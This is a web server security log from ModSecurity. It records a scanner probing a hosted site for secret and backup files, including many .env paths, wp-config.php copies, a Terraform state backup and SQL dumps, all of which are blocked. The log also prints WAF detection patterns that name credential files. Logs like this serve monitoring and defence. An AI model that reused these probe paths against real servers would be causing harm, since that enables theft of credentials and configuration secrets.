[Tue May 26 13:39:35.256787 2026] [security2:error] [pid 544395:tid 544626] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVPhmrs7g3RMCdp8XIxAAAAGU"]
[Tue May 26 13:39:35.307865 2026] [security2:error] [pid 536875:tid 536931] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/server/.env"] [unique_id "ahVVP-r_-FTveSGlx1Hp7wAA0jc"]
[Tue May 26 13:39:35.312068 2026] [security2:error] [pid 536875:tid 537002] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/server/api/.env"] [unique_id "ahVVP-r_-FTveSGlx1Hp8AAAyH4"]
[Tue May 26 13:39:35.314873 2026] [security2:error] [pid 536875:tid 536997] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/server/backend/.env"] [unique_id "ahVVP-r_-FTveSGlx1Hp8gAAyHk"]
[Tue May 26 13:39:35.367827 2026] [security2:error] [pid 536875:tid 536945] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/service/.env"] [unique_id "ahVVP-r_-FTveSGlx1Hp_QAAtkU"]
[Tue May 26 13:39:35.371893 2026] [security2:error] [pid 536875:tid 536949] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/services/.env"] [unique_id "ahVVP-r_-FTveSGlx1Hp_gAAvUk"]
[Tue May 26 13:39:35.461084 2026] [security2:error] [pid 536875:tid 536963] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/shared/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqCAAA6Vc"]
[Tue May 26 13:39:35.463950 2026] [security2:error] [pid 536875:tid 536952] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/shop/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqCQAA6Uw"]
[Tue May 26 13:39:35.473251 2026] [security2:error] [pid 536875:tid 536988] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/src/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqDwAA3XA"]
[Tue May 26 13:39:35.553958 2026] [core:crit] [pid 544395:tid 544650] (13)Permission denied: [client 40.77.167.132:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:39:35.612219 2026] [security2:error] [pid 536875:tid 536978] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/srv/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqHgAAqGY"]
[Tue May 26 13:39:35.612277 2026] [security2:error] [pid 536875:tid 536979] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/stage/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqHQAAqGc"]
[Tue May 26 13:39:35.613012 2026] [security2:error] [pid 536875:tid 536971] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/staging/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqIAAAqF8"]
[Tue May 26 13:39:35.747999 2026] [security2:error] [pid 536875:tid 536974] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/stg/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqJAAAj2I"]
[Tue May 26 13:39:35.757526 2026] [security2:error] [pid 536875:tid 536878] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/stripe/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqKwAA4gI"]
[Tue May 26 13:39:35.758192 2026] [cgid:error] [pid 536875:tid 536881] [remote 45.148.10.95:51320] AH01264: stderr from /home2/whitece9/public_html/sysinfo.cgi: script not found or unable to stat
[Tue May 26 13:39:35.808551 2026] [security2:error] [pid 536875:tid 536876] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/terraform.tfstate.backup"] [unique_id "ahVVP-r_-FTveSGlx1HqMgAAsQA"]
[Tue May 26 13:39:35.900622 2026] [security2:error] [pid 536875:tid 536886] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/test.php"] [unique_id "ahVVP-r_-FTveSGlx1HqNwABAAo"]
[Tue May 26 13:39:35.902562 2026] [security2:error] [pid 536875:tid 536943] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/test/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqOAABAEM"]
[Tue May 26 13:39:35.904076 2026] [security2:error] [pid 536875:tid 536960] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/v1/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqPgABAFQ"]
[Tue May 26 13:39:35.904125 2026] [security2:error] [pid 536875:tid 536889] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/user/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqPAABAA0"]
[Tue May 26 13:39:35.904404 2026] [security2:error] [pid 536875:tid 536890] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/v2/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqQAABAA4"]
[Tue May 26 13:39:35.905763 2026] [security2:error] [pid 536875:tid 536892] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/v3/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqQQABABA"]
[Tue May 26 13:39:36.056877 2026] [security2:error] [pid 536875:tid 536907] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/var/www/.env"] [unique_id "ahVVQOr_-FTveSGlx1HqUwABAh8"]
[Tue May 26 13:39:36.101473 2026] [security2:error] [pid 536875:tid 536984] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/var/www/html/.env"] [unique_id "ahVVQOr_-FTveSGlx1HqVAAAhmw"]
[Tue May 26 13:39:36.192105 2026] [security2:error] [pid 536875:tid 536913] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/web/.env"] [unique_id "ahVVQOr_-FTveSGlx1HqVwAAlSU"]
[Tue May 26 13:39:36.247365 2026] [security2:error] [pid 536875:tid 536918] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/website/.env"] [unique_id "ahVVQOr_-FTveSGlx1HqZQAAoio"]
[Tue May 26 13:39:36.343187 2026] [security2:error] [pid 536875:tid 536923] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "whitesun.in"] [uri "/wp-config.php.new"] [unique_id "ahVVQOr_-FTveSGlx1HqawAA4S8"]
[Tue May 26 13:39:36.343195 2026] [security2:error] [pid 536875:tid 536926] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "whitesun.in"] [uri "/wp-config.php.old"] [unique_id "ahVVQOr_-FTveSGlx1HqbAAA4TI"]
[Tue May 26 13:39:36.343214 2026] [security2:error] [pid 536875:tid 536930] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "whitesun.in"] [uri "/wp-config.php.bak"] [unique_id "ahVVQOr_-FTveSGlx1HqagAA4TY"]
[Tue May 26 13:39:36.343827 2026] [security2:error] [pid 536875:tid 536919] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/wp-config.php"] [unique_id "ahVVQOr_-FTveSGlx1HqaQAA4Ss"]
[Tue May 26 13:39:36.345688 2026] [security2:error] [pid 536875:tid 536909] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/wp-content/mysql.sql"] [unique_id "ahVVQOr_-FTveSGlx1HqbgAA4SE"]
[Tue May 26 13:39:36.491688 2026] [security2:error] [pid 544395:tid 544652] [client 45.148.10.95:9680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env"] [unique_id "ahVVQBmrs7g3RMCdp8XI4wAAAH8"]
[Tue May 26 13:39:36.493110 2026] [security2:error] [pid 544395:tid 544493] [remote 74.7.241.58:54164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVVQBmrs7g3RMCdp8XI5QAAVGE"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/fl
[Tue May 26 13:39:36.625336 2026] [autoindex:error] [pid 536875:tid 537116] [client 45.148.10.95:9730] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:36.647885 2026] [security2:error] [pid 536875:tid 537090] [client 45.148.10.95:9696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/backend/.env"] [unique_id "ahVVQOr_-FTveSGlx1HqegAAANo"]
[Tue May 26 13:39:36.757413 2026] [security2:error] [pid 544395:tid 544549] [client 45.148.10.95:9824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "whitesun.in"] [uri "/*update.cgi*"] [unique_id "ahVVQBmrs7g3RMCdp8XI7QAAABg"]
[Tue May 26 13:39:36.764928 2026] [security2:error] [pid 544395:tid 544628] [client 45.148.10.95:9744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.docker/.env"] [unique_id "ahVVQBmrs7g3RMCdp8XI7wAAAGc"]
[Tue May 26 13:39:36.877304 2026] [security2:error] [pid 536875:tid 537117] [client 45.148.10.95:9796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVVQOr_-FTveSGlx1HqgAAAAPU"]
[Tue May 26 13:39:36.907375 2026] [security2:error] [pid 544395:tid 544625] [client 45.148.10.95:9700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env.bak"] [unique_id "ahVVQBmrs7g3RMCdp8XI9QAAAGQ"]
[Tue May 26 13:39:36.922975 2026] [security2:error] [pid 544395:tid 544597] [client 45.148.10.95:9760] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env"] [unique_id "ahVVQBmrs7g3RMCdp8XI-AAAAEg"]
[Tue May 26 13:39:37.018641 2026] [security2:error] [pid 544395:tid 544601] [client 45.148.10.95:9812] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env.backup"] [unique_id "ahVVQRmrs7g3RMCdp8XI_AAAAEw"]
[Tue May 26 13:39:37.228676 2026] [security2:error] [pid 544395:tid 544615] [client 45.148.10.95:9744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env.old"] [unique_id "ahVVQRmrs7g3RMCdp8XJCQAAAFo"]
[Tue May 26 13:39:37.239692 2026] [security2:error] [pid 536875:tid 537059] [client 45.148.10.95:9892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/.env.php"] [unique_id "ahVVQer_-FTveSGlx1HqkAAAALs"]
[Tue May 26 13:39:37.274050 2026] [security2:error] [pid 544395:tid 544606] [client 45.148.10.95:9834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env.swp"] [unique_id "ahVVQRmrs7g3RMCdp8XJDAAAAFE"]
